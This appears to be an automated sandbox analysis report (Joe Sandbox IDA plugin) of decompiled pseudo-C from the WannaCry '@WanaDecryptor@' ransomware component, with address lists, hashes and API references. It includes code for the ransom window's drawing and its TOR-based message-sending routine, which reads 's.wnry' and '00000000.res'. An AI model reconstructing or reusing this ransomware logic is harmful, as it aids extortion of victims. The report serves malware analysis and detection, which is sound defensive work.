                                                      								 *(_t443 + 0x24) = 0;
                                                      								goto L21;
                                                      							}
                                                      							_t311 =  *(_t443 + 0x20);
                                                      							 *(_t443 + 0x2c) = _t311;
                                                      							_t438 = 0;
                                                      							 *(_t443 + 0x10) =  *(_t443 + 0x1c);
                                                      							 *(_t443 + 0x24) =  ~_t311;
                                                      							goto L21;
                                                      						}
                                                      						_t438 =  *(_t443 + 0x20);
                                                      						 *(_t443 + 0x10) = _t438;
                                                      						 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
                                                      						goto L20;
                                                      					} else {
                                                      						_t314 =  *(_t443 + 0x20);
                                                      						 *(_t443 + 0x10) =  *(_t443 + 0x1c);
                                                      						 *(_t443 + 0x2c) = _t314;
                                                      						 *(_t443 + 0x24) = _t314;
                                                      						L21:
                                                      						GetViewportOrgEx(_t433[2], _t443 + 0x1c);
                                                      						if((_t321[1] & 0x00000010) == 0) {
                                                      							asm("cdq");
                                                      							 *(_t443 + 0x44) =  *_t433;
                                                      							asm("cdq");
                                                      							 *((intOrPtr*)( *(_t443 + 0x48) + 0x40))(_t443 + 0x44, _t321[2] + (_t321[4] - _t321[2] + _t438 - _t321[2] >> 1), _t321[3] + (_t321[5] - _t321[3] +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1));
                                                      							if( *((intOrPtr*)(_t429 + 0x60)) !=  *((intOrPtr*)(_t429 + 0x64))) {
                                                      								_t264 =  *((intOrPtr*)(_t443 + 0xec));
                                                      								if( *_t264 !=  *((intOrPtr*)(_t264 + 8))) {
                                                      									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t264, _t443 + 0x1c, _t443 + 0x48);
                                                      								}
                                                      								_t440 =  *((intOrPtr*)(_t443 + 0xe8));
                                                      								if( *((intOrPtr*)(_t440 + 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8))) {
                                                      									_t282 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
                                                      									if( *(_t443 + 0x90) == 0xffffffff) {
                                                      										 *(_t443 + 0x6c) = _t282;
                                                      									}
                                                      									_t283 = _t440;
                                                      									 *((intOrPtr*)(_t443 + 0x30)) =  *_t283;
                                                      									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t283 + 4));
                                                      									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t283 + 8));
                                                      									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t283 + 0xc));
                                                      									 *((intOrPtr*)(_t443 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8));
                                                      									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t443 + 0x34, _t443 + 0x1c, _t443 + 0x48);
                                                      								}
                                                      								if( *_t440 >=  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
                                                      									L39:
                                                      									 *((intOrPtr*)( *_t433 + 0x40))(_t443 + 0x20,  *(_t443 + 0x1c),  *(_t443 + 0x20));
                                                      									 *(_t443 + 0xdc) = 9;
                                                      									L00412CC2();
                                                      									 *(_t443 + 0x78) = 0x416770;
                                                      									_t269 =  *(_t443 + 0x74);
                                                      									 *(_t443 + 0xdc) = 0xb;
                                                      									if(_t269 != 0xffffffff) {
                                                      										_push(_t269);
                                                      										L00413004();
                                                      									}
                                                      									 *(_t443 + 0x84) = 0x416774;
                                                      									_t270 =  *(_t443 + 0x70);
                                                      									 *(_t443 + 0xdc) = 0xc;
                                                      									if(_t270 != 0) {
                                                      										_push(_t270);
                                                      										L00412DC4();
                                                      									}
                                                      									 *(_t443 + 0x64) = 0x416778;
                                                      									_t271 =  *(_t443 + 0x6c);
                                                      									 *(_t443 + 0xdc) = 0xd;
                                                      									if(_t271 != 0xffffffff) {
                                                      										 *((intOrPtr*)( *_t433 + 0x38))(_t271);
                                                      									}
                                                      									 *(_t443 + 0x50) = 0x41677c;
                                                      									_t272 =  *(_t443 + 0x60);
                                                      									 *(_t443 + 0xdc) = 0xf;
                                                      									if(_t272 != 0) {
                                                      										 *((intOrPtr*)( *( *(_t443 + 0x54)) + 0x30))(_t272);
                                                      									}
                                                      									 *(_t443 + 0x60) = 0;
                                                      									L00412D52();
                                                      									_t226 = _t443 + 0x58;
                                                      									 *(_t443 + 0x58) = 0x415c00;
                                                      									 *(_t443 + 0x70) = _t226;
                                                      									 *(_t443 + 0xdc) = 0x10;
                                                      									L00412D52();
                                                      									 *(_t443 + 0x58) = 0x415bec;
                                                      									 *(_t443 + 0x50) = 0x416794;
                                                      									goto L48;
                                                      								} else {
                                                      									_t276 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
                                                      									if( *(_t443 + 0x6c) == 0xffffffff) {
                                                      										 *(_t443 + 0x6c) = _t276;
                                                      									}
                                                      									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t440 + 4));
                                                      									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t440 + 8));
                                                      									 *((intOrPtr*)(_t443 + 0x30)) =  *_t440;
                                                      									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))));
                                                      									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t440 + 0xc));
                                                      									_t279 =  *_t429;
                                                      									_push(_t443 + 0x48);
                                                      									_push(_t443 + 0x18);
                                                      									_t361 = _t443 + 0x38;
                                                      									L38:
                                                      									 *((intOrPtr*)(_t279 + 0xcc))(_t321, _t361);
                                                      									goto L39;
                                                      								}
                                                      							}
                                                      							 *((intOrPtr*)( *_t429 + 0xcc))(_t321,  *((intOrPtr*)(_t443 + 0xec)), _t443 + 0x1c, _t443 + 0x48);
                                                      							goto L39;
                                                      						}
                                                      						E00409D40(_t443 + 0x30, _t321,  *((intOrPtr*)(_t443 + 0xec)));
                                                      						_t295 =  *(_t443 + 0x2c);
                                                      						if( *(_t443 + 0x40) == 0) {
                                                      							_t295 =  *(_t443 + 0x10);
                                                      						}
                                                      						if(_t295 >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
                                                      							goto L39;
                                                      						} else {
                                                      							asm("cdq");
                                                      							_t418 =  *((intOrPtr*)(_t443 + 0x34));
                                                      							 *(_t443 + 0x40) =  *_t433;
                                                      							asm("cdq");
                                                      							 *((intOrPtr*)( *(_t443 + 0x44) + 0x40))(_t443 + 0x98, ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x30)) + _t438 - _t418 >> 1) +  *((intOrPtr*)(_t443 + 0x30)), ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x34)) +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1) + _t418);
                                                      							_t279 =  *_t429;
                                                      							_push(_t443 + 0x48);
                                                      							_t361 =  *((intOrPtr*)(_t443 + 0xf0));
                                                      							_push(_t443 + 0x18);
                                                      							goto L38;
                                                      						}
                                                      					}
                                                      				}
                                                      			}


































                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#540#5875#6170#800#860$#2818#2860#3874ExtentMessageObjectPoint32SendTextViewportWindow_ftol
                                                      • String ID: %d%%$gfff$pgA$pgA$tgA$tgA$xgA$xgA$|gA$|gA$[A
                                                      • API String ID: 2923375784-3599407550
                                                      • Opcode ID: 4537b4b5c38f08034835ba6f49b0df8f11378c8c8d7c7bac32dddfd5d0061b5a
                                                      • Instruction ID: e7c60e05cab477c723c52aa9b6021990c4bcf2d63edfa6d200c8e4e6b3644932
                                                      • Opcode Fuzzy Hash: 4537b4b5c38f08034835ba6f49b0df8f11378c8c8d7c7bac32dddfd5d0061b5a
                                                      • Instruction Fuzzy Hash: D312E2B0208381DFD714CF69C484A9BBBE5BBC8304F148A2EF89997391D774E945CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 72%
                                                      			E00405230(void* __ecx) {
                                                      				RECT* _v12;
                                                      				char _v20;
                                                      				char _v24;
                                                      				char _v28;
                                                      				char _v32;
                                                      				char _v36;
                                                      				char _v40;
                                                      				intOrPtr _v44;
                                                      				char _v48;
                                                      				char _v52;
                                                      				void* _v56;
                                                      				void* _v60;
                                                      				void* _v64;
                                                      				void* _v68;
                                                      				int _t98;
                                                      				int _t99;
                                                      				int _t104;
                                                      				char* _t106;
                                                      				void* _t109;
                                                      				char* _t110;
                                                      				signed int _t113;
                                                      				int _t114;
                                                      				void* _t117;
                                                      				char* _t118;
                                                      				char _t119;
                                                      				char* _t120;
                                                      				signed int _t122;
                                                      				void* _t123;
                                                      				int _t126;
                                                      				int _t127;
                                                      				int _t130;
                                                      				void* _t132;
                                                      				signed int _t136;
                                                      				signed int _t142;
                                                      				intOrPtr _t163;
                                                      				intOrPtr _t179;
                                                      				signed int _t182;
                                                      				signed int _t198;
                                                      				void* _t199;
                                                      				signed int _t200;
                                                      				void* _t201;
                                                      				intOrPtr* _t205;
                                                      				void* _t208;
                                                      				intOrPtr* _t212;
                                                      				intOrPtr* _t213;
                                                      				intOrPtr _t215;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413918);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t215;
                                                      				_t208 = __ecx;
                                                      				_t182 =  *(__ecx + 0x70);
                                                      				if(_t182 != 1) {
                                                      					if(__eflags <= 0) {
                                                      						L33:
                                                      						_t98 = InvalidateRect( *(_t208 + 0x20), 0, 1);
                                                      						L34:
                                                      						 *[fs:0x0] = _v12;
                                                      						return _t98;
                                                      					}
                                                      					__eflags =  *((char*)(__ecx + 0x4b)) - 1;
                                                      					if( *((char*)(__ecx + 0x4b)) != 1) {
                                                      						L15:
                                                      						_t99 =  *(_t208 + 0x78);
                                                      						__eflags = _t99 - 3;
                                                      						if(_t99 != 3) {
                                                      							__eflags = _t99 - 2;
                                                      							if(_t99 != 2) {
                                                      								__eflags = _t99;
                                                      								if(_t99 != 0) {
                                                      									__eflags = _t99 - 1;
                                                      									if(_t99 != 1) {
                                                      										goto L33;
                                                      									}
                                                      									_t212 = _t208 + 0x44;
                                                      									_t198 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
                                                      									_t136 =  *(_t208 + 0x74);
                                                      									asm("cdq");
                                                      									_t98 = _t198 / _t136;
                                                      									__eflags = _t98;
                                                      									if(_t98 == 0) {
                                                      										goto L34;
                                                      									}
                                                      									__eflags = _t198 - _t136;
                                                      									if(_t198 < _t136) {
                                                      										goto L34;
                                                      									}
                                                      									_t199 = 0;
                                                      									__eflags = _t98;
                                                      									if(_t98 <= 0) {
                                                      										goto L33;
                                                      									}
                                                      									_t126 = _t98;
                                                      									do {
                                                      										_push( *((intOrPtr*)(_t136 + _t199 +  *_t212 - 1)));
                                                      										_push(_t199);
                                                      										L00412E12();
                                                      										_push(1);
                                                      										_push( *(_t208 + 0x74) + _t199);
                                                      										L00412E0C();
                                                      										_t136 =  *(_t208 + 0x74);
                                                      										_t199 = _t199 + _t136;
                                                      										_t126 = _t126 - 1;
                                                      										__eflags = _t126;
                                                      									} while (_t126 != 0);
                                                      									goto L33;
                                                      								}
                                                      								_t213 = _t208 + 0x44;
                                                      								_t142 =  *(_t208 + 0x74);
                                                      								_t200 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
                                                      								asm("cdq");
                                                      								_t104 = _t200 / _t142;
                                                      								__eflags = _t104;
                                                      								if(_t104 == 0) {
                                                      									L22:
                                                      									_t104 = 1;
                                                      									L23:
                                                      									_t201 = 0;
                                                      									__eflags = _t104;
                                                      									if(_t104 <= 0) {
                                                      										goto L33;
                                                      									}
                                                      									_t127 = _t104;
                                                      									do {
                                                      										_push( *((intOrPtr*)(_t201 +  *_t213)));
                                                      										_push(_t142 + _t201);
                                                      										L00412E12();
                                                      										_push(1);
                                                      										_push(_t201);
                                                      										L00412E0C();
                                                      										_t142 =  *(_t208 + 0x74);
                                                      										_t201 = _t201 + _t142;
                                                      										_t127 = _t127 - 1;
                                                      										__eflags = _t127;
                                                      									} while (_t127 != 0);
                                                      									goto L33;
                                                      								}
                                                      								__eflags = _t200 - _t142;
                                                      								if(_t200 >= _t142) {
                                                      									goto L23;
                                                      								}
                                                      								goto L22;
                                                      							}
                                                      							_t106 =  &_v32;
                                                      							_push( *(_t208 + 0x74));
                                                      							_push(_t106);
                                                      							L00412E24();
                                                      							_push( *(_t208 + 0x74));
                                                      							_push( &_v24);
                                                      							_v12 = 8;
                                                      							L00412E30();
                                                      							_push( &_v48);
                                                      							_push(_t106);
                                                      							_push( &_v36);
                                                      							_v20 = 9;
                                                      							L00412E18();
                                                      							_push(_t106);
                                                      							_v32 = 0xa;
                                                      							L00412D9A();
                                                      							_v36 = 9;
                                                      							L00412CC2();
                                                      							_v36 = 8;
                                                      							L00412CC2();
                                                      							_v36 = 0xffffffff;
                                                      							L00412CC2();
                                                      							goto L33;
                                                      						}
                                                      						_push( *(_t208 + 0x74));
                                                      						_push( &_v36);
                                                      						L00412E1E();
                                                      						_v12 = 5;
                                                      						_t109 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8) -  *(_t208 + 0x74);
                                                      						_push(_t109);
                                                      						_push( &_v36);
                                                      						L00412E24();
                                                      						_push(_t109);
                                                      						_t110 =  &_v52;
                                                      						_push(_t110);
                                                      						_push( &_v40);
                                                      						_v20 = 6;
                                                      						L00412E18();
                                                      						_push(_t110);
                                                      						_v32 = 7;
                                                      						L00412D9A();
                                                      						_v36 = 6;
                                                      						L00412CC2();
                                                      						_v36 = 5;
                                                      						L00412CC2();
                                                      						_v36 = 0xffffffff;
                                                      						L00412CC2();
                                                      						goto L33;
                                                      					}
                                                      					_t163 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
                                                      					_t113 =  *(__ecx + 0x74) * _t182;
                                                      					__eflags = _t163 - _t113;
                                                      					if(_t163 >= _t113) {
                                                      						goto L15;
                                                      					}
                                                      					_t114 = _t113 - _t163;
                                                      					__eflags = _t114;
                                                      					if(_t114 <= 0) {
                                                      						goto L15;
                                                      					}
                                                      					_t130 = _t114;
                                                      					do {
                                                      						_push( *((intOrPtr*)(__ecx + 0x40)));
                                                      						L00412E36();
                                                      						_t130 = _t130 - 1;
                                                      						__eflags = _t130;
                                                      					} while (_t130 != 0);
                                                      					goto L15;
                                                      				}
                                                      				if( *((intOrPtr*)(__ecx + 0x4b)) != _t182) {
                                                      					L6:
                                                      					_t205 = _t208 + 0x44;
                                                      					if( *(_t208 + 0x78) != 0) {
                                                      						_t117 =  *((intOrPtr*)( *_t205 - 8)) - 1;
                                                      						_push(_t117);
                                                      						_push( &_v36);
                                                      						L00412E24();
                                                      						_t118 =  &_v36;
                                                      						_push(1);
                                                      						_push(_t118);
                                                      						_v12 = 2;
                                                      						L00412E1E();
                                                      						_push(_t117);
                                                      						_push(_t118);
                                                      						_push( &_v40);
                                                      						_v20 = 3;
                                                      						L00412E18();
                                                      						_push(_t118);
                                                      						_v32 = 4;
                                                      						L00412D9A();
                                                      						_v36 = 3;
                                                      						L00412CC2();
                                                      						_v36 = 2;
                                                      						L00412CC2();
                                                      						_v36 = 0xffffffff;
                                                      						L00412CC2();
                                                      					} else {
                                                      						_push(1);
                                                      						_push( &_v24);
                                                      						_t119 =  *((intOrPtr*)( *_t205));
                                                      						_v36 = _t119;
                                                      						L00412E30();
                                                      						_v12 = 0;
                                                      						_push(_v44);
                                                      						_push(_t119);
                                                      						_t120 =  &_v36;
                                                      						_push(_t120);
                                                      						L00412E2A();
                                                      						_push(_t120);
                                                      						_v24 = 1;
                                                      						L00412D9A();
                                                      						_v28 = 0;
                                                      						L00412CC2();
                                                      						_v28 = 0xffffffff;
                                                      						L00412CC2();
                                                      					}
                                                      					goto L33;
                                                      				}
                                                      				_t179 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
                                                      				_t122 =  *(__ecx + 0x74);
                                                      				if(_t179 >= _t122) {
                                                      					goto L6;
                                                      				}
                                                      				_t123 = _t122 - _t179;
                                                      				if(_t123 <= 0) {
                                                      					goto L6;
                                                      				}
                                                      				_t132 = _t123;
                                                      				do {
                                                      					_push( *((intOrPtr*)(__ecx + 0x40)));
                                                      					L00412E36();
                                                      					_t132 = _t132 - 1;
                                                      				} while (_t132 != 0);
                                                      				goto L6;
                                                      			}

                                                      0x00405384
                                                      0x00405386
                                                      0x00000000
                                                      0x00000000
                                                      0x00405388
                                                      0x0040538a
                                                      0x0040538c
                                                      0x00000000
                                                      0x00000000
                                                      0x0040538e
                                                      0x00405390
                                                      0x00405393
                                                      0x00405396
                                                      0x0040539b
                                                      0x0040539b
                                                      0x0040539b
                                                      0x00000000
                                                      0x00405390
                                                      0x0040525d
                                                      0x00405285
                                                      0x00405288
                                                      0x0040528d
                                                      0x004052f9
                                                      0x004052fa
                                                      0x004052fb
                                                      0x004052fc
                                                      0x00405303
                                                      0x00405307
                                                      0x00405309
                                                      0x0040530c
                                                      0x00405314
                                                      0x00405319
                                                      0x00405320
                                                      0x00405321
                                                      0x00405322
                                                      0x00405326
                                                      0x0040532b
                                                      0x0040532e
                                                      0x00405333
                                                      0x0040533c
                                                      0x00405340
                                                      0x00405349
                                                      0x0040534e
                                                      0x00405357
                                                      0x0040535f
                                                      0x0040528f
                                                      0x00405295
                                                      0x00405297
                                                      0x00405298
                                                      0x0040529c
                                                      0x004052a0
                                                      0x004052a9
                                                      0x004052b1
                                                      0x004052b2
                                                      0x004052b3
                                                      0x004052b7
                                                      0x004052b8
                                                      0x004052bd
                                                      0x004052c0
                                                      0x004052c5
                                                      0x004052ce
                                                      0x004052d3
                                                      0x004052dc
                                                      0x004052e4
                                                      0x004052e4
                                                      0x00000000
                                                      0x0040528d
                                                      0x00405265
                                                      0x00405268
                                                      0x0040526d
                                                      0x00000000
                                                      0x00000000
                                                      0x0040526f
                                                      0x00405273
                                                      0x00000000
                                                      0x00000000
                                                      0x00405275
                                                      0x00405277
                                                      0x0040527a
                                                      0x0040527d
                                                      0x00405282
                                                      0x00405282
                                                      0x00000000

                                                      APIs
                                                      • #940.MFC42(?), ref: 0040527D
                                                      • #4277.MFC42(?,00000001), ref: 004052A0
                                                      • #923.MFC42(?,00000000,?), ref: 004052B8
                                                      • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
                                                      • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
                                                      • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
                                                      • #4129.MFC42(?,?), ref: 004052FC
                                                      • #5710.MFC42 ref: 00405314
                                                      • #922.MFC42(?,00000000,00000000), ref: 00405326
                                                      • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
                                                      • #940.MFC42(?), ref: 00405396
                                                      • #5710.MFC42(?,?), ref: 004053B8
                                                      • #4129.MFC42(?,?,?,?), ref: 004053D7
                                                      • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
                                                      • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
                                                      • #4129.MFC42(?,?), ref: 00405443
                                                      • #4277.MFC42(?,?,?,?), ref: 0040545B
                                                      • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
                                                      • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
                                                      • #6778.MFC42(?,00000001), ref: 004054EA
                                                      • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
                                                      • #6778.MFC42(00000000,?), ref: 00405536
                                                      • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#858$#4129#922$#4277#5710#6648#6778#940$#923InvalidateRect
                                                      • String ID:
                                                      • API String ID: 2121400562-0
                                                      • Opcode ID: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                                      • Instruction ID: 4ea7c19ebb0ecad4eacefd8b4ebc091e45acf9db756171f3a68d6c32b1a6cadd
                                                      • Opcode Fuzzy Hash: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                                      • Instruction Fuzzy Hash: A4A1B770204B81AFC714DB29C590A6FB7E6EFD4304F040A1EF596D3391D7B8E8558B66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 56%
                                                      			E004082C0(void* __ecx) {
                                                      				void* __ebp;
                                                      				signed int _t44;
                                                      				void* _t45;
                                                      				void* _t47;
                                                      				signed int _t48;
                                                      				signed int _t51;
                                                      				signed int _t56;
                                                      				signed int _t58;
                                                      				signed int _t59;
                                                      				void* _t60;
                                                      				signed int _t65;
                                                      				signed int _t90;
                                                      				signed int _t91;
                                                      				signed int _t104;
                                                      				intOrPtr* _t106;
                                                      				struct _IO_FILE* _t107;
                                                      				signed int _t108;
                                                      				void* _t111;
                                                      				intOrPtr _t114;
                                                      				void* _t115;
                                                      				void* _t116;
                                                      				void* _t118;
                                                      				void* _t120;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413FCE);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t114;
                                                      				_t115 = _t114 - 0x8c;
                                                      				_t111 = __ecx;
                                                      				 *((intOrPtr*)(_t115 + 0xa4)) = 0;
                                                      				_t44 =  *( *((intOrPtr*)(_t115 + 0xac)) - 8);
                                                      				if(_t44 > 0x3e8) {
                                                      					_push(0x3e8);
                                                      					_push(0);
                                                      					_push(_t115 + 0x14);
                                                      					L00412F6E();
                                                      					_push(_t44);
                                                      					 *((char*)(_t115 + 0xa8)) = 1;
                                                      					L00412D9A();
                                                      					 *((char*)(_t115 + 0xa4)) = 0;
                                                      					L00412CC2();
                                                      				}
                                                      				if( *( *((intOrPtr*)(_t115 + 0xac)) - 8) >= 0xa) {
                                                      					_t106 = __imp__time;
                                                      					_t45 =  *_t106(0);
                                                      					_t90 =  *0x4218a8; // 0x0
                                                      					_t116 = _t115 + 4;
                                                      					__eflags = _t45 - _t90 - 0xb4;
                                                      					if(_t45 - _t90 >= 0xb4) {
                                                      						L13:
                                                      						_t47 =  *_t106(0);
                                                      						_t91 =  *0x4218a8; // 0x0
                                                      						_t116 = _t116 + 4;
                                                      						_t48 = _t47 - _t91;
                                                      						__eflags = _t48 - 0xe10;
                                                      						if(_t48 <= 0xe10) {
                                                      							L9:
                                                      							__eflags =  *0x4218ac - 3; // 0x0
                                                      							if(__eflags < 0) {
                                                      								L15:
                                                      								 *((intOrPtr*)(_t116 + 0x14)) = 0;
                                                      								memset(_t116 + 0x18, 0, 0x21 << 2);
                                                      								_t51 = fopen("00000000.res", "rb");
                                                      								_t107 = _t51;
                                                      								_t118 = _t116 + 0x14;
                                                      								__eflags = _t107;
                                                      								if(_t107 != 0) {
                                                      									fread(_t118 + 0x1c, 0x88, 1, _t107);
                                                      									fclose(_t107);
                                                      									E0040BE90("s.wnry", _t111 + 0x6ea, _t111 + 0x74e);
                                                      									_push(0);
                                                      									_push( *((intOrPtr*)(_t118 + 0xcc)));
                                                      									_push(_t118 + 0x38);
                                                      									_push(_t111 + 0x5f0);
                                                      									_t56 = E0040C060( *((intOrPtr*)(_t118 + 0xcc)), __eflags);
                                                      									_t118 = _t118 + 0x30;
                                                      									_t108 = _t56;
                                                      									E0040C670();
                                                      									_t58 =  *(_t118 + 0xb0);
                                                      									__eflags = _t108;
                                                      									if(_t108 < 0) {
                                                      										__eflags = _t58;
                                                      										if(_t58 != 0) {
                                                      											_push(0);
                                                      											_push(0x30);
                                                      											_push("Failed to send your message!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
                                                      											L00412CC8();
                                                      										}
                                                      									} else {
                                                      										__eflags = _t58;
                                                      										if(_t58 != 0) {
                                                      											L00412CC8();
                                                      											__imp__time(0, "Your message has been sent successfully!", 0x40, 0);
                                                      											_t118 = _t118 + 4;
                                                      											 *0x4218a8 = _t58;
                                                      										}
                                                      									}
                                                      									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
                                                      									L00412CC2();
                                                      									_t59 = _t108;
                                                      								} else {
                                                      									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
                                                      									L00412CC2();
                                                      									_t59 = _t51 | 0xffffffff;
                                                      								}
                                                      								L23:
                                                      								 *[fs:0x0] =  *((intOrPtr*)(_t118 + 0x9c));
                                                      								return _t59;
                                                      							}
                                                      							__eflags =  *(_t116 + 0xb0);
                                                      							if( *(_t116 + 0xb0) != 0) {
                                                      								L00412DA6();
                                                      								 *((char*)(_t116 + 0xa8)) = 2;
                                                      								_t60 =  *_t106(0);
                                                      								_t104 =  *0x4218a8; // 0x0
                                                      								_t120 = _t116 + 4;
                                                      								__eflags = 0x3d;
                                                      								_push(0x3d - ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5) + ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5 >> 0x1f));
                                                      								_push("You are sending too many mails! Please try again %d minutes later.");
                                                      								_push(_t120 + 0x10);
                                                      								L00412E00();
                                                      								_t48 =  *(_t120 + 0x1c);
                                                      								_t116 = _t120 + 0xc;
                                                      								_push(0);
                                                      								_push(0);
                                                      								_push(_t48);
                                                      								L00412CC8();
                                                      								 *((char*)(_t116 + 0xa4)) = 0;
                                                      								L00412CC2();
                                                      							}
                                                      							 *((intOrPtr*)(_t116 + 0xa4)) = 0xffffffff;
                                                      							L00412CC2();
                                                      							_t59 = _t48 | 0xffffffff;
                                                      							goto L23;
                                                      						}
                                                      						 *0x4218ac = 0;
                                                      						goto L15;
                                                      					}
                                                      					_t65 =  *0x4218ac; // 0x0
                                                      					__eflags = _t65 - 3;
                                                      					if(_t65 >= 3) {
                                                      						goto L13;
                                                      					}
                                                      					_t48 = _t65 + 1;
                                                      					__eflags = _t48;
                                                      					 *0x4218ac = _t48;
                                                      					goto L9;
                                                      				}
                                                      				if( *((intOrPtr*)(_t115 + 0xb0)) != 0) {
                                                      					_push(0);
                                                      					_push(0);
                                                      					_push("Too short message!");
                                                      					L00412CC8();
                                                      				}
                                                      				 *((intOrPtr*)(_t115 + 0xa4)) = 0xffffffff;
                                                      				L00412CC2();
                                                      				_t59 = _t44 | 0xffffffff;
                                                      				goto L23;
                                                      			}


























                                                      0x004083a1
                                                      0x004083a3
                                                      0x00000000
                                                      0x00000000
                                                      0x004083a9
                                                      0x004083a9
                                                      0x004083aa
                                                      0x00000000
                                                      0x004083aa
                                                      0x0040834b
                                                      0x0040834d
                                                      0x0040834e
                                                      0x0040834f
                                                      0x00408354
                                                      0x00408354
                                                      0x00408360
                                                      0x0040836b
                                                      0x00408370
                                                      0x00000000

                                                      APIs
                                                      • #4278.MFC42(000003E8,00000000,000003E8,?,?,77005C80), ref: 0040830D
                                                      • #858.MFC42 ref: 00408322
                                                      • #800.MFC42 ref: 00408332
                                                      • #1200.MFC42(Too short message!,00000000,00000000,?,?,77005C80), ref: 00408354
                                                      • #800.MFC42 ref: 0040836B
                                                      • time.MSVCRT ref: 0040837F
                                                      • #540.MFC42 ref: 004083C8
                                                      • time.MSVCRT ref: 004083D6
